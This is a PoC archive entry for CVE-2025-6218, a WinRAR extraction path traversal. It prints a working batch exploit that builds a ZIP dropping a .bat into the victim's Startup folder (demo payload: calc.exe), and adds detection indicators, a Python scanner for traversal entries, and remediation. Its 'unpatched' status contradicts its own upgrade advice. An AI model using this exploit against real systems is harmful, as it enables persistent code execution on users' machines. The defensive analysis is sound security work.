PoC Archive

WinRAR Archive Extraction Path Traversal (CVE-2025-6218)

by skimask1690 · 2026-05-15

Severity:          High
CVE:               CVE-2025-6218
Category:          misc
Affected product:  WinRAR archive extraction workflow
Affected versions: WinRAR 7.11 and earlier
Disclosed:         2026-05-15
Patch status:      unpatched

Metadata

Date Added:          2026-05-15
Author / Researcher: skimask1690
CVE / Advisory:      CVE-2025-6218
Category:            misc
Severity:            High
CVSS Score:          N/A
Status:              Weaponized
Tags:                path-traversal, arbitrary-file-write, startup-folder, WinRAR, Windows, user-interaction
Related:             N/A

Affected Target

Software / System:       WinRAR archive extraction workflow
Versions Affected:       WinRAR 7.11 and earlier
Language / Platform:     Batch / Windows
Authentication Required: Partial (user interaction required)
Network Access Required: Local only

Summary

This PoC demonstrates CVE-2025-6218 in WinRAR, where a crafted archive extraction path can place files outside the intended destination directory. The provided batch script builds a ZIP archive that writes a .bat file into the current user’s Startup folder. On vulnerable versions, extracting this archive via WinRAR’s extraction flow can lead to code execution on next logon.


Vulnerability Details

Root Cause

WinRAR's path handling in the vulnerable extraction workflow does not confine extracted entries to the chosen destination directory: traversal-like path components stored in the archive are honoured during extraction, allowing an attacker-controlled file write into sensitive user-writable locations such as the Startup folder.

Attack Vector

An attacker prepares a crafted archive and delivers it to a target user. The user opens the archive with WinRAR and extracts it using the indicated extraction option. The extracted payload lands in the Startup folder.

Impact

Arbitrary file write to Startup can be abused for persistence and execution of attacker-controlled commands when the user logs in, resulting in local code execution in the victim user context.


Environment / Lab Setup

OS:          Windows
Target:      WinRAR 7.11 or earlier
Attacker:    Authorized security tester
Tools:       WinRAR (default install path), cmd.exe

Setup Steps


Proof of Concept

Step-by-Step Reproduction

  1. Generate the crafted archive by running the batch script:

       exploit.bat

  2. Extract in the vulnerable WinRAR flow by right-clicking the ZIP, opening it with WinRAR, and using **Extract to {folder}**.

  3. Verify the Startup drop at:

       %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup

  4. Log off/on and observe calc.exe executing from the Startup payload.

Exploit Code

See exploit.bat in this folder.

@echo off
echo calc.exe > POC.bat
"C:\Program Files\WinRAR\WinRAR.exe" a -ap" \.. \.. \.. \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" %~dp0CVE-2025-6218.zip POC.bat

Expected Output

[+] CVE-2025-6218.zip created successfully!

Screenshots / Evidence

  • screenshots/ — add authorized lab screenshots showing Startup file placement and post-login execution.

Detection & Indicators of Compromise

- Unexpected .bat/.cmd files written to user Startup folders after archive extraction
- WinRAR extraction activity followed by new persistence artifacts in Startup
- Unexpected calculator or command execution at user logon

SIEM / IDS Rule (example):

Detect archive extraction process chain where WinRAR writes files under
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
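Added defensive example (not code from the PoC repository): a Python scanner that resolves each ZIP entry name the way a lenient Windows extractor would (backslash or slash as separator, trailing spaces on a component ignored, so the ".. " components produced by the -ap switch above count as "..") and flags entries that would escape the destination directory or land in the Startup folder, without extracting anything. The entry names in SAMPLE_ENTRIES are constructed for the demonstration.

```python
import re
import zipfile

# Path fragment that identifies the per-user Startup folder once an entry name
# has been normalized to forward slashes and lower case.
STARTUP_MARKER = "/microsoft/windows/start menu/programs/startup/"

# Constructed entry names for the demonstration (not read from a real archive):
# a benign file, the whitespace-padded ".. " pattern the PoC's -ap switch
# produces, and a plain traversal entry.
SAMPLE_ENTRIES = [
    "report/readme.txt",
    " \\.. \\.. \\.. \\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\POC.bat",
    "..\\..\\notes.txt",
]

def analyze_entry(name):
    """Resolve one entry name as a lenient Windows extractor would and report
    whether it leaves the destination directory or targets Startup."""
    absolute = name.startswith(("\\", "/")) or re.match(r"^[A-Za-z]:", name) is not None
    depth, min_depth, resolved = 0, 0, []
    for part in re.split(r"[\\/]", name):
        part = part.strip()          # Windows drops trailing spaces, so ".. " == ".."
        if part in ("", "."):
            continue
        if part == "..":
            depth -= 1
            min_depth = min(min_depth, depth)  # below zero means we left the destination
            if resolved:
                resolved.pop()
            continue
        depth += 1
        resolved.append(part)
    normalized = "/" + "/".join(resolved).lower()
    return {
        "name": name,
        "escapes_destination": absolute or min_depth < 0,
        "targets_startup": STARTUP_MARKER in normalized,
    }

def scan_names(names):
    """Return findings for entry names that escape the destination or hit Startup."""
    return [f for f in map(analyze_entry, names)
            if f["escapes_destination"] or f["targets_startup"]]

def scan_zip(path):
    """Scan a ZIP on disk by its central directory only; nothing is extracted."""
    with zipfile.ZipFile(path) as zf:
        return scan_names(zf.namelist())

if __name__ == "__main__":
    for finding in scan_names(SAMPLE_ENTRIES):
        print(finding)
```

The same check can be applied to RAR listings by feeding the entry names from any archive tool's list output into scan_names.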

Remediation

Patch:            Upgrade WinRAR to 7.12 or later
Workaround:       Avoid extracting untrusted archives; disable automatic Startup execution monitoring exceptions
Config Hardening: Monitor and alert on new files in Startup folders and restrict untrusted archive handling

References


Notes

Auto-ingested from https://github.com/skimask1690/CVE-2025-6218-POC on 2026-05-15.

exploit.bat
REM Authorized security research and testing only.
@echo off
title CVE-2025-6218 POC

echo calc.exe > POC.bat

:: Assumes that two directories up from the current working directory corresponds to the user's home directory (%USERPROFILE%)
"C:\Program Files\WinRAR\WinRAR.exe" a -ap" \.. \.. \.. \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" %~dp0CVE-2025-6218.zip POC.bat

echo.
if errorlevel 1 (
    echo [!] Failed to create POC.
) else (
    echo [+] CVE-2025-6218.zip created successfully!
)
echo.

del POC.bat

pause